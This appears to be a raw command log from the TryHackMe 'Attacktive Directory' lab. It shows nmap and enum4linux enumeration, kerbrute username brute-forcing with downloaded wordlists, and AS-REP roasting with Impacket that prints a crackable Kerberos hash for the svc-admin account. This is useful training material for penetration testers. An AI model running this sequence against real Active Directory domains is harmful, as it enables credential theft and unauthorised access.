
https://tryhackme.com/room/attacktivedirectory

>nmap -F -A -Pn 10.10.144.202
        Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-20 07:57 GMT
        Nmap scan report for spookysec.local (10.10.144.202)
        Host is up (0.0050s latency).
        Not shown: 92 closed ports
        PORT     STATE SERVICE       VERSION
        53/tcp   open  domain        Microsoft DNS
        80/tcp   open  http          Microsoft IIS httpd 10.0
        | http-methods: 
        |_  Potentially risky methods: TRACE
        |_http-server-header: Microsoft-IIS/10.0
        |_http-title: IIS Windows Server
        88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-02-20 07:57:27Z)
        135/tcp  open  msrpc         Microsoft Windows RPC
        139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
        389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
        445/tcp  open  microsoft-ds?
        3389/tcp open  ms-wbt-server Microsoft Terminal Services
        | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
        | Not valid before: 2021-02-19T07:25:21
        |_Not valid after:  2021-08-21T07:25:21
        |_ssl-date: 2021-02-20T07:57:45+00:00; 0s from scanner time.
        MAC Address: 02:97:B2:05:D8:25 (Unknown)
        No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
        TCP/IP fingerprint:
        OS:SCAN(V=7.60%E=4%D=2/20%OT=53%CT=7%CU=32401%PV=Y%DS=1%DC=D%G=Y%M=0297B2%T
        OS:M=6030C103%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=I%CI=I%TS=U
        OS:)SEQ(SP=104%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=104%GCD=1%ISR=
        OS:10E%TI=I%TS=U)OPS(O1=M2301NW8NNS%O2=M2301NW8NNS%O3=M2301NW8%O4=M2301NW8N
        OS:NS%O5=M2301NW8NNS%O6=M2301NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFF
        OS:F%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=8
        OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(
        OS:R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
        OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
        OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
        OS:=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
        OS:(R=Y%DFI=N%T=80%CD=Z)

        Network Distance: 1 hop
        Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

        Host script results:
        |_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:97:b2:05:d8:25 (unknown)
        | smb2-security-mode: 
        |   2.02: 
        |_    Message signing enabled and required
        | smb2-time: 
        |   date: 2021-02-20 07:57:45
        |_  start_date: 1600-12-31 23:58:45

        TRACEROUTE
        HOP RTT     ADDRESS
        1   5.03 ms spookysec.local (10.10.144.202)

        OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
        Nmap done: 1 IP address (1 host up) scanned in 37.16 seconds

>echo 10.10.144.202 spookysec.local >> /etc/hosts
>enum4linux -a spookysec.local
        WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
        WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
        Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 20 07:46:52 2021

        ========================== 
        |    Target Information    |
        ========================== 
        Target ........... drive.local
        RID Range ........ 500-550,1000-1050
        Username ......... ''
        Password ......... ''
        Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


        =================================================== 
        |    Enumerating Workgroup/Domain on drive.local    |
        =================================================== 
        [E] Can't find workgroup/domain


        =========================================== 
        |    Nbtstat Information for drive.local    |
        =========================================== 
        ^C
        root@ip-10-10-45-67:~# ping spookysec.local
        PING spookysec.local (10.10.144.202) 56(84) bytes of data.
        64 bytes from spookysec.local (10.10.144.202): icmp_seq=1 ttl=128 time=4.19 ms
        64 bytes from spookysec.local (10.10.144.202): icmp_seq=2 ttl=128 time=3.52 ms
        ^C
        --- spookysec.local ping statistics ---
        2 packets transmitted, 2 received, 0% packet loss, time 1001ms
        rtt min/avg/max/mdev = 3.527/3.861/4.195/0.334 ms
        root@ip-10-10-45-67:~# enum4linux -a ^C
        root@ip-10-10-45-67:~# enum4linux -a spookysec.local
        WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
        WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
        Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 20 07:47:47 2021

        ========================== 
        |    Target Information    |
        ========================== 
        Target ........... spookysec.local
        RID Range ........ 500-550,1000-1050
        Username ......... ''
        Password ......... ''
        Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


        ======================================================= 
        |    Enumerating Workgroup/Domain on spookysec.local    |
        ======================================================= 
        [+] Got domain/workgroup name: THM-AD

        =============================================== 
        |    Nbtstat Information for spookysec.local    |
        =============================================== 
        Looking up status of 10.10.144.202
            ATTACKTIVEDIREC <00> -         B <ACTIVE>  Workstation Service
            THM-AD          <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            THM-AD          <1c> - <GROUP> B <ACTIVE>  Domain Controllers
            THM-AD          <1b> -         B <ACTIVE>  Domain Master Browser
            ATTACKTIVEDIREC <20> -         B <ACTIVE>  File Server Service

            MAC Address = 02-97-B2-05-D8-25

        ======================================== 
        |    Session Check on spookysec.local    |
        ======================================== 
        [+] Server spookysec.local allows sessions using username '', password ''

        ============================================== 
        |    Getting domain SID for spookysec.local    |
        ============================================== 
        Domain Name: THM-AD
        Domain Sid: S-1-5-21-3591857110-2884097990-301047963
        [+] Host is part of a domain (not a workgroup)

        ========================================= 
        |    OS information on spookysec.local    |
        ========================================= 
        Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
        [+] Got OS info for spookysec.local from smbclient: 
        [+] Got OS info for spookysec.local from srvinfo:
        Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

        ================================ 
        |    Users on spookysec.local    |
        ================================ 
        [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

        [E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

        ============================================ 
        |    Share Enumeration on spookysec.local    |
        ============================================ 
        WARNING: The "syslog" option is deprecated
        smb1cli_req_writev_submit: called for dialect[SMB3_11] server[spookysec.local]

            Sharename       Type      Comment
            ---------       ----      -------
        Error returning browse list: NT_STATUS_REVISION_MISMATCH
        Reconnecting with SMB1 for workgroup listing.
        Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
        Failed to connect with SMB1 -- no workgroup available

        [+] Attempting to map shares on spookysec.local

        ======================================================= 
        |    Password Policy Information for spookysec.local    |
        ======================================================= 
        [E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/


        ================================= 
        |    Groups on spookysec.local    |
        ================================= 

        [+] Getting builtin groups:

        [+] Getting builtin group memberships:

        [+] Getting local groups:

        [+] Getting local group memberships:

        [+] Getting domain groups:

        [+] Getting domain group memberships:

        ========================================================================== 
        |    Users on spookysec.local via RID cycling (RIDS: 500-550,1000-1050)    |
        ========================================================================== 
        [I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
        [I] Found new SID: S-1-5-21-3532885019-1334016158-1514108833
        [+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''
        S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
        S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
        S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
        S-1-5-21-3591857110-2884097990-301047963-503 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-504 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-505 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-506 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-507 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-508 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-509 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-510 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-511 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
        S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-523 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-524 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
        S-1-5-21-3591857110-2884097990-301047963-528 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-529 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-530 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-531 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-532 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-533 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-534 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-535 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-536 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-537 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-538 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-539 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-540 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-541 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-542 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-543 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-544 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-545 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-546 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-547 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-548 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-549 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-550 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
        S-1-5-21-3591857110-2884097990-301047963-1001 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1002 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1003 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1004 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1005 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1006 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1007 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1008 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1009 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1010 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1011 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1012 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1013 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1014 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1015 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1016 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1017 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1018 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1019 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1020 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1021 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1022 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1023 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1024 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1025 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1026 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1027 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1028 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1029 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1030 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1031 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1032 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1033 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1034 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1035 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1036 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1037 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1038 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1039 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1040 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1041 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1042 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1043 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1044 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1045 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1046 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1047 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1048 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1049 *unknown*\*unknown* (8)
        S-1-5-21-3591857110-2884097990-301047963-1050 *unknown*\*unknown* (8)
        [+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
        S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-505 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-506 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-507 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-508 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-509 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-510 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-511 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-512 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
        S-1-5-21-3532885019-1334016158-1514108833-514 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-515 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-516 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-517 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-518 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-519 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-520 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-521 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-522 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-523 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-524 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-525 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-526 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-527 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-528 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-529 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-530 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-531 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-532 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-533 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-534 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-535 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-536 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-537 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-538 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-539 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-540 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-541 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-542 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-543 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-544 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-545 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-546 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-547 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-548 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-549 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-550 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1000 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1001 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1002 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1003 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1004 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1005 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1006 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1007 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1008 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1009 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1010 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1011 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1012 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1013 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1014 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1015 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1016 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1017 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1018 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1019 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1020 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1021 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1022 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1023 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1024 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1025 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1026 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1027 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1028 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1029 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1030 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1031 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1032 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1033 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1034 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1035 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1036 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1037 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1038 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1039 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1040 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1041 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1042 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1043 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1044 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1045 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1046 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1047 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1048 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1049 *unknown*\*unknown* (8)
        S-1-5-21-3532885019-1334016158-1514108833-1050 *unknown*\*unknown* (8)

        ================================================ 
        |    Getting printer info for spookysec.local    |
        ================================================ 
        Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


        enum4linux complete on Sat Feb 20 07:48:19 2021

>mkdir kerbrute
>cd kerbrute
>wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O kerbrute
>chmod +x kernrute
>wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt -O user_list.txt
>wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt -O password_list.txt
>./kerbrute userenum --dc spookysec.local -d spookysec.local user_list.txt
         __             __               __     
        / /_____  _____/ /_  _______  __/ /____ 
        / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
        / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
        /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

        Version: v1.0.3 (9dad6e1) - 02/20/21 - Ronnie Flathers @ropnop

        2021/02/20 08:32:48 >  Using KDC(s):
        2021/02/20 08:32:48 >  	spookysec.local:88

        2021/02/20 08:32:48 >  [+] VALID USERNAME:	 james@spookysec.local
        2021/02/20 08:32:48 >  [+] VALID USERNAME:	 svc-admin@spookysec.local
        2021/02/20 08:32:48 >  [+] VALID USERNAME:	 James@spookysec.local
        2021/02/20 08:32:49 >  [+] VALID USERNAME:	 robin@spookysec.local
        2021/02/20 08:32:50 >  [+] VALID USERNAME:	 darkstar@spookysec.local
        2021/02/20 08:32:50 >  [+] VALID USERNAME:	 administrator@spookysec.local
        2021/02/20 08:32:51 >  [+] VALID USERNAME:	 backup@spookysec.local
        2021/02/20 08:32:52 >  [+] VALID USERNAME:	 paradox@spookysec.local
        2021/02/20 08:32:56 >  [+] VALID USERNAME:	 JAMES@spookysec.local
        2021/02/20 08:32:57 >  [+] VALID USERNAME:	 Robin@spookysec.local
        2021/02/20 08:33:05 >  [+] VALID USERNAME:	 Administrator@spookysec.local
        2021/02/20 08:33:20 >  [+] VALID USERNAME:	 Darkstar@spookysec.local
        2021/02/20 08:33:25 >  [+] VALID USERNAME:	 Paradox@spookysec.local
        2021/02/20 08:33:41 >  [+] VALID USERNAME:	 DARKSTAR@spookysec.local
        2021/02/20 08:33:45 >  [+] VALID USERNAME:	 ori@spookysec.local
        2021/02/20 08:33:54 >  [+] VALID USERNAME:	 ROBIN@spookysec.local
        2021/02/20 08:34:46 >  Done! Tested 100000 usernames (16 valid) in 117.845 seconds

>find / -type f -name 'GetNPUsers.py'        
        /usr/local/bin/GetNPUsers.py

>python3 /usr/local/bin/GetNPUsers.py spookysec.local/ -usersfile /root/Desktop/collected_users.txt -format hashcat
        Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

        [-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        $krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:9ed815e9cfff70c54806f799bc701aba$341511cec7be3ed611bef4e8309ecefdb6d1dd45bc51860fde29d8ad3fa6311c06f9cbfcac01321382633fc7b88a2409e5d31ee2f72f8bc7fa2b6efe57f97b02e26ec1260ae0838948c9cae078819b0e4859f159176268dbfce6690583433254391374b6dbc26c6f155b202a5869b9c27e415a94165bf611b812caf9dceee68c96d85d5ac9cc121d1d2b857540127cef722a3dc4d3f6f4f45a63ad3df5b23c2d968874ff82cb411a033c43c54ec70bc8fd6eed76b0a8e3722f4fe221a1519441ba061aeca260846f215602d5c7f366f314189babc086083873a86c1f4209a83d44ae113910222aae9b7ab402f2d82a2a98cd
        [-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
